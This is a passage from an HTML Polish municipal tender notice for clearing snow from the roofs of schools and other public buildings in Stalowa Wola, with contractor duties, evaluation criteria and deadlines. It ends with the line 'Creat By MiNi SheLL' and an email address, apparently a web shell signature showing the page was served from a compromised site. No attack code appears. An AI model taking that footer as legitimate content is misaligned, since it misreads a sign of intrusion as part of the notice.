m2 x Publiczna Szkoła Podstawowa z Oddziałami Mistrzostwa Sportowego nr 2 im. Jana Pawła II przy ul. Mickiewicza 15.<br/>3)	dach budynku o powierzchni ok. 2700 m2 Publiczna Szkoła Podstawowa nr 3 im. Bohaterów Westerplatte przy ul. Wyszyńskiego 14.<br/>4)	dach budynku o powierzchni ok. 1442,30 m2 x 2 usługa łączna powierzchnia ok. 2884,60 m2 Publiczna Szkoła Podstawowa nr 4 im. E. Kwiatkowskiego przy ul. Niezłomnych 1.<br/>5)	dach budynku o powierzchni ok. 1000 m2 x 2 usługa łączna powierzchnia ok. 2000 m2 Publiczna Szkoła Podstawowa nr 5 im. Energetyków przy ul. Energetyków 18.<br/>6)	dach budynku o powierzchni ok. 1524,50 m2 x 2 usługa łączna powierzchni ok. 3049,00 m2 Publiczna Szkoła Podstawowa z Oddziałami Integracyjnymi nr 7 im. Mikołaj Kopernika przy ul. gen. L. Okulickiego 14.<br/>7)	dach budynku o powierzchni ok. 1287 m2 x 3 usługa łączna powierzchnia ok. 3861 m2 Publiczna Szkoła Podstawowa nr 9 przy ul. Rozwadowska 10. <br/>8)	dach budynku o powierzchni ok. 2400 m2 x 2 usługa łączna powierzchnia ok. 4800 m2 Publiczna Szkoła Podstawowa nr 11 im. Szarych Szeregów przy ul. Wojska Polskiego 9.<br/>9)	dach budynku płaski o powierzchni ok. 1166 m2 x 3 usługa łączna powierzchnia ok. 3500 m2 Publiczna Szkoła Podstawowa nr 12 przy ul. Poniatowskiego 55. <br/>Łączna powierzchnia (orientacyjna) w okresie realizacji zamówienia części wynosi: 25075,60 m2<br/>3.	Płatnikami za świadczoną usługę odśnieżania dachów na obiektach będą poszczególne jednostki organizacyjne podległe Gminie Stalowa Wola. <br/>4.	Wykonawca do dnia podpisania Umowy przekaże osobie odpowiedzialnej merytorycznie od strony Zamawiającego wykaz osób realizujących zamówienie oraz kopie aktualnych orzeczeń lekarskich dopuszczających te osoby do pracy na wysokości powyżej 3 m na cały okres trwania umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie realizacji o nowych pracowników, również z załączeniem wymienionych orzeczeń lekarskich.<br/>5.	Prace wykonywane będą w czynnych, eksploatowanych obiektach: mogą być realizowane w każdym dniu tygodnia w godzinach uzgodnionych z Zamawiającym. <br/>6.	Przed rozpoczęciem odśnieżania dachu, należy wyznaczyć strefy zrzutu śniegu, w sposób widoczny je wygrodzić i przez cały okres zrzutu nie dopuścić pieszych lub parkowania samochodów. Stery zrzutu powinny być wskazane przez Właściciela lub Zarządcę obiektu. <br/>7. Realizacja zamówienia będzie wykonywana w sposób opisany poniżej: <br/>1.) Zamawiający dokona zlecenia odśnieżania dachu, jeżeli grubość pokrywy śnieżnej na dachu osiągnie min. 15 cm. <br/>2.) Wykonawca jest zobowiązany do wykonywania usługi w następujący sposób: <br/>a.	za odśnieżony uważa się dach z którego usunięto warstwę śniegu, sople i wszelkie nawisy; <br/>b.	ze względu na możliwość uszkodzenia pokrycia dachów obiektów, zamawiający wymaga pozostawienia warstwy ok. 1,5 cm zlodowacenia przylegającego do odśnieżanego podłoża, o ile ono występuje, oraz wpisania w protokole odbioru prac grubości pozostawionej warstwy zlodowacenia;<br/>c.	niedopuszczalne jest tworzenie hałd śniegu na dachach;<br/>d.	do usuwania śniegu wykonawca użyje sprzętu, który nie będzie powodował uszkodzeń pokrycia dachowego odśnieżanych budynków; <br/>e.	hałdy śniegu nie mogą przylegać do elewacji odśnieżanego obiektu oraz nie mogą utrudniać ruchu pieszego i samochodowego. Hałdy nie mogą uniemożliwiać korzystania z wyjść, w tym także ewakuacyjnych z obiektów;<br/>f.	wszystkie uszkodzenia elewacji, pokryć dachowych oraz urządzeń będących w pobliżu, wynikłe przy odśnieżaniu, spowodowane między innymi przez nacisk zwałów z hałdowanego śniegu na elementy obiektu (takie jak bramy, drzwi itp.) - zostaną naprawione na koszt Wykonawcy; <br/>g.	każde miejsce zrzutu śniegu musi być wygrodzone i trwale oznakowane przez Wykonawcę, zgodnie z przepisami BHP; <br/>h.	śnieg zrzucony z dachów powinien zostać ;<br/>i.	Wykonawca musi dysponować osobami posiadającymi odpowiednie kwalifikacje oraz aktualne zezwolenia upoważniające do pracy na wysokości;<br/>j.	Wykonawca musi dysponować potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia;<br/>k.	usługa musi być wykonywana zgodnie z przepisami BHP;<br/>l.	Wykonawca zabezpieczy na bieżąco teren, na którym będzie wykonywana usługa, w sposób uniemożliwiający wyrządzenie szkód w mieniu lub osobom trzecim;<br/>m.	Wykonawca ma obowiązek być ubezpieczonym od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia;<br/>n.	Zamawiający przewiduje kilkukrotne odśnieżanie dachów obiektów podczas trwania umowy, co uzależnione jest od zaistniałych warunków atmosferycznych; <br/>3.) Przy opracowaniu oferty należy wziąć pod uwagę fakt, że Zamawiający nie przewiduje zapłaty za gotowość tylko za efektywną pracę.<br/>4.) Obiekty do odśnieżania zgłaszane będą przez Zamawiającego na bieżąco (pisemnie), w razie wystąpienia okoliczności, w których niezbędne jest wykonanie usługi. <br/>5.) Odpowiedzialny za nadzór nad wykonaniem zleconych prac będzie kierownik poszczególnego obiektu.<br/>6.) Rozliczenie usługi nastąpi fakturami po wykonaniu i odbiorze prac. Podstawę do rozliczenia usługi będą stanowiły protokoły odbioru prac potwierdzone przez kierownika poszczególnego obiektu.<br/>7.) Wykonawca zobowiązany będzie przyjmować pisemne zlecenia (sms, e-mail lub faks) od Zamawiającego oraz wykonywania usługi określonej w zleceniu oraz przystępować do realizacji zlecenia w terminie określonym w ofercie.<br/>8.) Maksymalny czas realizacji zlecenia wymagany przez Zamawiającego wynosi 24 godziny od momentu zgłoszenia zlecenia przez Zamawiającego.<br/>9.) Zaleca się zaznajomienie z topografią terenu i dokonanie wizji lokalnej jako czynności pomocniczej przy przygotowaniu oferty. Brak udziału w wizji lokalnej obiektów nie wyklucza możliwości składania ofert. <br/>10.)	Wykonawca przed podpisaniem umowy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie usługi w kolejnych sezonach zimowych <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia świadczenie usług w zakresie usuwania śniegu z dachów obiektów jednostek podlegających Gminie Stalowa Wola (wraz ze z hałdowaniem w miejscu wskazanym przez Zamawiającego do odległości 2 m od obiektu w sezonie zimowym 2022 r.”, w podziale na trzy części:Część 3:<br/>1)	Miejski Żłobek Integracyjny <br/>ul. Poniatowskiego 55 A<br/>37-450 Stalowa Wola <br/>NIP: 8652565324, REGON: 365876488 <br/>2)	Miejski Ośrodek Sportu i Rekreacji <br/>ul. Hutnicza 15<br/>37-450 Stalowa Wola <br/>NIP: 8651005770 REGON: 830217582 <br/>3)	Miejski Ośrodek Pomocy Społecznej <br/>ul. Dmowskiego 1<br/>37-450 Stalowa Wola <br/>NIP: 8652063924, REGON: 005660296<br/>Część nr 3<br/>1)	dach budynku o powierzchni ok 1000 m2 x 3 usługa łączna powierzchnia ok. 3000 m2 Miejski Żłobek Integracyjny przy ul. Poniatowskiego 55A.<br/>2)	dach budynku o powierzchni ok. 4000 m2 Miejski Ośrodek Sportu i Rekreacji przy ul. Hutnicza 15.<br/>3)	dach budynku o powierzchni ok. 1100 m2 Miejski Ośrodek Pomocy Społecznej przy ul. R. Dmowskiego 1. <br/>Łączna powierzchnia (orientacyjna) w okresie realizacji zamówienia części wynosi: 8100,00 m2<br/><br/>3.	Płatnikami za świadczoną usługę odśnieżania dachów na obiektach będą poszczególne jednostki organizacyjne podległe Gminie Stalowa Wola. <br/>4.	Wykonawca do dnia podpisania Umowy przekaże osobie odpowiedzialnej merytorycznie od strony Zamawiającego wykaz osób realizujących zamówienie oraz kopie aktualnych orzeczeń lekarskich dopuszczających te osoby do pracy na wysokości powyżej 3 m na cały okres trwania umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie umowy. W razie potrzeby wykaz zgłoszonych pracowników może być rozszerzony w okresie realizacji o nowych pracowników, również z załączeniem wymienionych orzeczeń lekarskich.<br/>5.	Prace wykonywane będą w czynnych, eksploatowanych obiektach: mogą być realizowane w każdym dniu tygodnia w godzinach uzgodnionych z Zamawiającym. <br/>6.	Przed rozpoczęciem odśnieżania dachu, należy wyznaczyć strefy zrzutu śniegu, w sposób widoczny je wygrodzić i przez cały okres zrzutu nie dopuścić pieszych lub parkowania samochodów. Stery zrzutu powinny być wskazane przez Właściciela lub Zarządcę obiektu. <br/>7. Realizacja zamówienia będzie wykonywana w sposób opisany poniżej: <br/>1.) Zamawiający dokona zlecenia odśnieżania dachu, jeżeli grubość pokrywy śnieżnej na dachu osiągnie min. 15 cm. <br/>2.) Wykonawca jest zobowiązany do wykonywania usługi w następujący sposób: <br/>a.	za odśnieżony uważa się dach z którego usunięto warstwę śniegu, sople i wszelkie nawisy; <br/>b.	ze względu na możliwość uszkodzenia pokrycia dachów obiektów, zamawiający wymaga pozostawienia warstwy ok. 1,5 cm zlodowacenia przylegającego do odśnieżanego podłoża, o ile ono występuje, oraz wpisania w protokole odbioru prac grubości pozostawionej warstwy zlodowacenia;<br/>c.	niedopuszczalne jest tworzenie hałd śniegu na dachach;<br/>d.	do usuwania śniegu wykonawca użyje sprzętu, który nie będzie powodował uszkodzeń pokrycia dachowego odśnieżanych budynków; <br/>e.	hałdy śniegu nie mogą przylegać do elewacji odśnieżanego obiektu oraz nie mogą utrudniać ruchu pieszego i samochodowego. Hałdy nie mogą uniemożliwiać korzystania z wyjść, w tym także ewakuacyjnych z obiektów;<br/>f.	wszystkie uszkodzenia elewacji, pokryć dachowych oraz urządzeń będących w pobliżu, wynikłe przy odśnieżaniu, spowodowane między innymi przez nacisk zwałów z hałdowanego śniegu na elementy obiektu (takie jak bramy, drzwi itp.) - zostaną naprawione na koszt Wykonawcy; <br/>g.	każde miejsce zrzutu śniegu musi być wygrodzone i trwale oznakowane przez Wykonawcę, zgodnie z przepisami BHP; <br/>h.	śnieg zrzucony z dachów powinien zostać ;<br/>i.	Wykonawca musi dysponować osobami posiadającymi odpowiednie kwalifikacje oraz aktualne zezwolenia upoważniające do pracy na wysokości;<br/>j.	Wykonawca musi dysponować potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia;<br/>k.	usługa musi być wykonywana zgodnie z przepisami BHP;<br/>l.	Wykonawca zabezpieczy na bieżąco teren, na którym będzie wykonywana usługa, w sposób uniemożliwiający wyrządzenie szkód w mieniu lub osobom trzecim;<br/>m.	Wykonawca ma obowiązek być ubezpieczonym od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia;<br/>n.	Zamawiający przewiduje kilkukrotne odśnieżanie dachów obiektów podczas trwania umowy, co uzależnione jest od zaistniałych warunków atmosferycznych; <br/>3.) Przy opracowaniu oferty należy wziąć pod uwagę fakt, że Zamawiający nie przewiduje zapłaty za gotowość tylko za efektywną pracę.<br/>4.) Obiekty do odśnieżania zgłaszane będą przez Zamawiającego na bieżąco (pisemnie), w razie wystąpienia okoliczności, w których niezbędne jest wykonanie usługi. <br/>5.) Odpowiedzialny za nadzór nad wykonaniem zleconych prac będzie kierownik poszczególnego obiektu.<br/>6.) Rozliczenie usługi nastąpi fakturami po wykonaniu i odbiorze prac. Podstawę do rozliczenia usługi będą stanowiły protokoły odbioru prac potwierdzone przez kierownika poszczególnego obiektu.<br/>7.) Wykonawca zobowiązany będzie przyjmować pisemne zlecenia (sms, e-mail lub faks) od Zamawiającego oraz wykonywania usługi określonej w zleceniu oraz przystępować do realizacji zlecenia w terminie określonym w ofercie.<br/>8.) Maksymalny czas realizacji zlecenia wymagany przez Zamawiającego wynosi 24 godziny od momentu zgłoszenia zlecenia przez Zamawiającego.<br/>9.) Zaleca się zaznajomienie z topografią terenu i dokonanie wizji lokalnej jako czynności pomocniczej przy przygotowaniu oferty. Brak udziału w wizji lokalnej obiektów nie wyklucza możliwości składania ofert. <br/>10.)	Wykonawca przed podpisaniem umowy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności oraz następstw nieszczęśliwych wypadków dotyczących zatrudnionych pracowników oraz osób trzecich i mienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie usługi w kolejnych sezonach zimowych <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem ust. 2,3.<br/>2.	Zmiany umowy dokonywanej na podstawie art 455 ust. 1 ustawy Prawo zamówień publicznych. <br/>3.	Zmianę końcowego terminu wykonania przedmiotu umowy w przypadku przedłużenia sezonu zimowego, które uzależnione będzie od zaistniałych warunków atmosferycznych.<br/>4.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">SCUW Stalowa Wola</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com